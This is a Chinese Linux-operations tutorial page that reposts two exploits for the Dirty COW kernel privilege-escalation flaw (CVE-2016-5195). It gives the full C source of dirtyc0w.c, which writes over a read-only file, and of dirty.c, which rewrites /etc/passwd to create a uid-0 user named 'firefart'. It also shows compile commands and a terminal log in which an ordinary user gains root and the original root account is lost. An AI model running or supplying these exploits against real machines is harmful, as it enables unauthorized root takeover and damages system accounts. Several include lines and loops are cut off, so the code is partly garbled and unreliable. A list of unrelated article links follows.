str045漏洞提权linux,Linux运维知识之CVE-2016-5195 Dirtycow: Linux内核提权漏洞
本文主要向大家介Linux运维知识之CVE-2016-5195 Dirtycow: Linux内核提权漏洞绍了,通过具体的内容向大家展现,希望对大家学习Linux运维知识有所帮助。
CVE-2016-5195 Dirtycow: Linux内核提权漏洞
以下都是github上找的源码,然后在ubuntu-12.04.5-desktop-i386上实验成功
首先运行下面的确定漏洞:
/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
正确输出最后值说明漏洞存在(以上有两条是root权限运行的命令)
####################### dirtyc0w.c #######################
*/
#include
#include
#include
#include
#include
#include
#include
#include
void *map;
int f;
struct stat st;
char *name;
void *madviseThread(void *arg)
{
char *str;
str=(char*)arg;
int i,c=0;
for(i=0;i<100000000;i++)
{
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
c+=madvise(map,100,MADV_DONTNEED);
}
printf("madvise %d\n\n",c);
}
void *procselfmemThread(void *arg)
{
char *str;
str=(char*)arg;
/*
You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
> The in the wild exploit we are aware of doesn‘t work on Red Hat
> Enterprise Linux 5 and 6 out of the box because on one side of
> the race it writes to /proc/self/mem, but /proc/self/mem is not
> writable on Red Hat Enterprise Linux 5 and 6.
*/
int f=open("/proc/self/mem",O_RDWR);
int i,c=0;
for(i=0;i<100000000;i++) {
/*
You have to reset the file pointer to the memory position.
*/
lseek(f,(uintptr_t) map,SEEK_SET);
c+=write(f,str,strlen(str));
}
printf("procselfmem %d\n\n", c);
}
int main(int argc,char *argv[])
{
/*
You have to pass two arguments. File and Contents.
*/
if (argc<3) {
(void)fprintf(stderr, "%s\n",
"usage: dirtyc0w target_file new_content");
return 1; }
pthread_t pth1,pth2;
/*
You have to open the file in read only mode.
*/
f=open(argv[1],O_RDONLY);
fstat(f,&st);
name=argv[1];
/*
You have to use MAP_PRIVATE for copy-on-write mapping.
> Create a private copy-on-write mapping. Updates to the
> mapping are not visible to other processes mapping the same
> file, and are not carried through to the underlying file. It
> is unspecified whether changes made to the file after the
> mmap() call are visible in the mapped region.
*/
/*
You have to open with PROT_READ.
*/
map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
printf("mmap %zx\n\n",(uintptr_t) map);
/*
You have to do it on two threads.
*/
pthread_create(&pth1,NULL,madviseThread,argv[1]);
pthread_create(&pth2,NULL,procselfmemThread,argv[2]);
/*
You have to wait for the threads to finish.
*/
pthread_join(pth1,NULL);
pthread_join(pth2,NULL);
return 0;
}
漏洞利用源码:
//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
// The default is "firefart".
//
// Original exploit (dirtycow‘s ptrace_pokedata "pokemon" method):
// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with:
// gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
// "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh firefart@..."
//
// DON‘T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
// mv /tmp/passwd.bak /etc/passwd
//
// Exploit adopted by Christian "FireFart" Mehlmauer
// https://firefart.at
//
// $ gcc -pthread dirty.c -o dirty -lcrypt
// $ ./dirty test(test为密码)
// $ su firefart(在输入test密码即可)
// 普通用户运行上述命令后,firefart用户变为root,原始root不存在
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "firefart";
int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;
struct Userinfo {
char *username;
char *hash;
int user_id;
int group_id;
char *info;
char *home_dir;
char *shell;
};
char *generate_password_hash(char *plaintext_pw) {
return crypt(plaintext_pw, salt);
}
char *generate_passwd_line(struct Userinfo u) {
const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
int size = snprintf(NULL, 0, format, u.username, u.hash,
u.user_id, u.group_id, u.info, u.home_dir, u.shell);
char *ret = malloc(size + 1);
sprintf(ret, format, u.username, u.hash, u.user_id,
u.group_id, u.info, u.home_dir, u.shell);
return ret;
}
void *madviseThread(void *arg) {
int i, c = 0;
for(i = 0; i
c += madvise(map, 100, MADV_DONTNEED);
}
printf("madvise %d\n\n", c);
}
int copy_file(const char *from, const char *to) {
// check if target file already exists
if(access(to, F_OK) != -1) {
printf("File %s already exists! Please delete it and run again\n",
to);
return -1;
}
char ch;
FILE *source, *target;
source = fopen(from, "r");
if(source == NULL) {
return -1;
}
target = fopen(to, "w");
if(target == NULL) {
fclose(source);
return -1;
}
while((ch = fgetc(source)) != EOF) {
fputc(ch, target);
}
printf("%s successfully backed up to %s\n",
from, to);
fclose(source);
fclose(target);
return 0;
}
int main(int argc, char *argv[])
{
// backup file
int ret = copy_file(filename, backup_filename);
if (ret != 0) {
exit(ret);
}
struct Userinfo user;
// set values, change as needed
user.username = "firefart";
user.user_id = 0;
user.group_id = 0;
user.info = "pwned";
user.home_dir = "/root";
user.shell = "/bin/bash";
char *plaintext_pw;
if (argc >= 2) {
plaintext_pw = argv[1];
printf("Please enter the new password: %s\n", plaintext_pw);
} else {
plaintext_pw = getpass("Please enter the new password: ");
}
user.hash = generate_password_hash(plaintext_pw);
char *complete_passwd_line = generate_passwd_line(user);
printf("Complete line:\n%s\n", complete_passwd_line);
f = open(filename, O_RDONLY);
fstat(f, &st);
map = mmap(NULL,
st.st_size + sizeof(long),
PROT_READ,
MAP_PRIVATE,
f,
0);
printf("mmap: %lx\n",(unsigned long)map);
pid = fork();
if(pid) {
waitpid(pid, NULL, 0);
int u, i, o, c = 0;
int l=strlen(complete_passwd_line);
for(i = 0; i
for(o = 0; o
for(u = 0; u
c += ptrace(PTRACE_POKETEXT,
pid,
map + o,
*((long*)(complete_passwd_line + o)));
}
}
}
printf("ptrace %d\n",c);
}
else {
pthread_create(&pth,
NULL,
madviseThread,
NULL);
ptrace(PTRACE_TRACEME);
kill(getpid(), SIGSTOP);
pthread_join(pth,NULL);
}
printf("Done! Check %s to see if the new user was created.\n", filename);
printf("You can log in with the username ‘%s‘ and the password ‘%s‘.\n\n",
user.username, plaintext_pw);
printf("\nDON‘T FORGET TO RESTORE! $ mv %s %s\n",
backup_filename, filename);
return 0;
}
运行结果:
1、漏洞存在与否:jin@jin:/home/poc/dirty$ ls
dirty.c dirtyc0w.c
jin@jin:/home/poc/dirty$ sudo -s
[sudo] password for jin:
root@jin:/home/poc/dirty# echo this is not a test > foo
root@jin:/home/poc/dirty# chmod 0404 foo
root@jin:/home/poc/dirty# gcc -pthread dirtyc0w.c -o dirtyc0w
root@jin:/home/poc/dirty# ./dirtyc0w foo m00000000000000000
mmap b7741000
madvise 0
procselfmem 1800000000
root@jin:/home/poc/dirty# cat foom00000000000000000
2、漏洞利用:root@jin:/home/poc/dirty# su jin
jin@jin:/home/poc/dirty$ gcc -pthread dirty.c -o dirty -lcrypt
jin@jin:/home/poc/dirty$ ./dirty test
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: test
Complete line:
firefart:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash
mmap: b77b8000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username ‘firefart‘ and the password ‘test‘.
DON‘T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username ‘firefart‘ and the password ‘test‘.
DON‘T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
jin@jin:/home/poc/dirty$ su
Password:
su: Authentication failure
jin@jin:/home/poc/dirty$ sudo su
sudo: unknown user: root
sudo: unable to initialize policy plugin
jin@jin:/home/poc/dirty$ su firefart
Password:
firefart@jin:/home/poc/dirty# id
uid=0(firefart) gid=0(root) groups=0(root)
本文由职坐标整理并发布,希望对同学们有所帮助。了解更多详情请关注系统运维Linux频道!
str045漏洞提权linux,Linux运维知识之CVE-2016-5195 Dirtycow: Linux内核提权漏洞相关推荐
- linux高级运维笔试简答题及答案,企业linux初级和高级运维面试常问题目问答总结技巧讲解(2020年录制)...
课程增值: 课程是我最近面试辅导的所有学员,成功找到工作,企业常问题目,我带领大家学习,面试如何问答. 我曾经经历面试linux运维没有做大量准备,经历大量hr给我说的一句话就是 回家等通知吧,心碎了 ...
- 千峰云计算linux教程650集,linux系统运维从入门到精通教程(Linux安装极速入门,零基础必备)
第一天 1. 完成VMware下载,centos7下载,完成配置,获得模拟服务器一台. 2. 使用root登录. 服务器 (可以当初普通计算机,与普通的计算机内部结构相差不大) VMware是安装虚拟 ...
- Linux日常运维(rsync通过服务连接,linux日志,screen)
一.rsync通过服务同步 分为服务端(server1) 和客户端(server2) 服务端(server1): [root@litongyao ~]# vim /etc/rsyncd.conf po ...
- 很实用的Linux 系统运维常用命令及常识(超实用)
很实用的Linux 系统运维常用命令及常识(超实用) 作为Linux运维,需要了解Linux操作系统的基本使用和管理知识,下面脚本之家小编给大家介绍下Linux运维需要掌握的命令,想成为Linux运维 ...
- 运维工程师必会的linux命令下载,运维工程师必会的109个Linux命令.pdf
Linux公社 运维工程师必会的109 个Linux 命令 版本 1.0 崔存新 目录 1 文件管理 5 1.1 basename 5 1.2 cat 5 1.3 cd 6 1.4 chgrp 6 1 ...
- linux怎么用命令打开wine,Linux系统运维:10分钟教你如何使用Wine在Linux下玩魔兽世界...
本文主要向大家介绍了Linux系统运维的如何使用Wine在Linux下玩魔兽世界,通过具体的步骤向大家展现,希望对大家学习Linux系统运维有所帮助. 目标:在 Linux 中运行魔兽世界 发行版:适 ...
- linux系统运维面试题
标签:linux系统运维面试题 1. 简述常用高可用技术 解答: Keepalived:Keepalived是一个保证集群高可用的服务软件,用来防止单点故障,使用VRRP协议实现.在maste ...
- 力作推荐!!!! 防线:企业Linux安全运维理念和实战(向世界500强企业学习Linux安全管理与运维之道)...
防线:企业Linux安全运维理念和实战(向世界500强企业学习Linux安全管理与运维之道) 新书发售 http://product.dangdang.com/product.aspx?pr ...
- 【微学堂】线上Linux服务器运维安全策略经验分享
技术转载:https://mp.weixin.qq.com/s?__biz=MjM5NTU2MTQwNA==&mid=402022683&idx=1&sn=6d403ab447 ...
最新文章
- 【数学专题】矩阵乘法
- 浅谈大数据中的 2PC、3PC、Paxos、Raft、ZAB
- linux下安装ftp服务器
- Java学习笔记——显示当前日期的三种方式
- 获取了网站源码有什么用_角点科技:用 Wordpress 建设企业网站需要准备些什么...
- 不同视图间的跳转方式
- 互联网职场就像一场《鱿鱼游戏》
- Python有了concurrent的话mutiprocessing和threading还有存在的意义吗?
- Oracle里面的用户user无法登录 LOCKED(TIMED)
- Android中Messenger的使用
- XAMPP 无法启动解决
- TensorFlow实现卷积、池化操作
- ALM产品六爻:TeleLogic, Rational, DevTrack, Jira, RTC, URTrack...
- 【原】expdp参数CONTENT
- .foreach()需要判断空吗_这次我们来聊聊 Stream#forEach 源码
- gulp前端自动化构建工具使用
- 原子结构示意图全部_原子结构示意图知识点总结
- 长期不使用计算机会损坏吗,电脑长时间存放不用会不会影响硬件寿命
- 代码自动删除QQ空间里的说说
- JPEG2000图像压缩算法学习
热门文章
- 前端学习资料及路线名称网站
- logstash异常
- 关于'java' 不是内部或外部命令,也不是可运行的程序 或批处理文件 和 错误: 找不到或无法加载主类 helloworld的问题...
- 20155307 2016-2017 《Java程序设计》第三次实验报告
- Virtural Box 虚拟ubuntu 修改分辨率
- PHP从零开始--数据库
- 看完后完全了解 Vue 2.0 和 Vue 3.0 的区别
- springboot---request 中Parameter,Attribute区别
- vue --- 使用component的 :is属性切换标签页
- Android 自定义WebView弹窗及屏蔽弹窗